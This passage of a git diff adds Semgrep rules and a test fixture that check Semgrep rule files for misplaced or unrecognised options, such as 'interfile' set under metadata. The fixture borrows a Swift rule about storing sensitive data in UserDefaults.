`metadata` field. + languages: [yaml] + severity: WARNING + patterns: + - pattern: | + rules: + - id: $ID + ... + $METADATA: + ... + $INTERFILE: true + ... + ... + - pattern-inside: | + rules: + - id: $ID + ... + $OPTIONS: + $FIRST_OPT: $VAL + ... + ... + - pattern-not-inside: | + rules: + - id: $ID + ... + $OPTIONS: + ... + interfile: true + ... + ... + - metavariable-regex: + metavariable: $INTERFILE + regex: interfile + - metavariable-regex: + metavariable: $METADATA + regex: metadata + - metavariable-regex: + metavariable: $OPTIONS + regex: options + - focus-metavariable: $VAL + fix: | + $VAL + interfile: true diff --git a/yaml/semgrep/metadata-incorrect-option.test.yaml b/yaml/semgrep/metadata-incorrect-option.test.yaml new file mode 100644 index 0000000000..1870c8fcc6 --- /dev/null +++ b/yaml/semgrep/metadata-incorrect-option.test.yaml @@ -0,0 +1,37 @@ +rules: + - id: swift-user-defaults + message: Potentially sensitive data was observed to be stored in UserDefaults, + which is not adequate protection of sensitive information. For data of a + sensitive nature, applications should leverage the Keychain. + severity: WARNING + metadata: + likelihood: LOW + impact: HIGH + confidence: MEDIUM + category: security + cwe: + - "CWE-311: Missing Encryption of Sensitive Data" + masvs: + - "MASVS-STORAGE-1: The app securely stores sensitive data" + owasp: + - A03:2017 - Sensitive Data Exposure + - A04:2021 - Insecure Design + references: + - https://developer.apple.com/library/archive/documentation/Security/Conceptual/SecureCodingGuide/Articles/ValidatingInput.html + - https://mas.owasp.org/MASVS/controls/MASVS-STORAGE-1/ + subcategory: + - vuln + technology: + - ios + - macos + license: Commons Clause License Condition v1.0[LGPL-2.1-only] + vulnerability_class: + - Cryptographic Issues + languages: + - swift + options: + # ruleid: metadata-incorrect-option + taint_propagation: true + # ruleid: metadata-incorrect-option + value: 2 + patterns: \ No newline at end of file diff --git a/yaml/semgrep/metadata-incorrect-option.yaml b/yaml/semgrep/metadata-incorrect-option.yaml new file mode 100644 index 0000000000..91609afdf8 --- /dev/null +++ b/yaml/semgrep/metadata-incorrect-option.yaml @@ -0,0 +1,25 @@ +rules: + - id: metadata-incorrect-option + message: >- + It looks like $KEY is not in the default list of expected options, if this is a new key update this rule + languages: + - yaml + severity: INFO + metadata: + references: + - https://semgrep.dev/docs/contributing/contributing-to-semgrep-rules-repository + category: correctness + technology: + - semgrep + patterns: + - pattern-inside: | + rules: ... + - pattern-inside: | + options: + $A + - focus-metavariable: $A + - pattern: | + $KEY: $VALUE + - metavariable-regex: + metavariable: $KEY + regex: (?!options|constant_propagation|symbolic_propagation|taint_unify_mvars|taint_assume_safe_functions|taint_assume_safe_indexes|taint_assume_safe_comparisons|taint_assume_safe_booleans|taint_assume_safe_numbers|ac_matching|commutative_boolop|flddef_assign|arrow_is_function|let_is_var|go_deeper_expr|go_deeper_stmt|implicit_deep_exprstmt|implicit_ellipsis|xml_singleton_loose_matching|xml_attrs_implicit_ellipsis|xml_children_ordered|generic_engine|generic_multiline|generic_braces|generic_extra_braces|generic_extra_word_characters|generic_caseless|generic_ellipsis_max_span|generic_comment_style|interfile|generic_engine)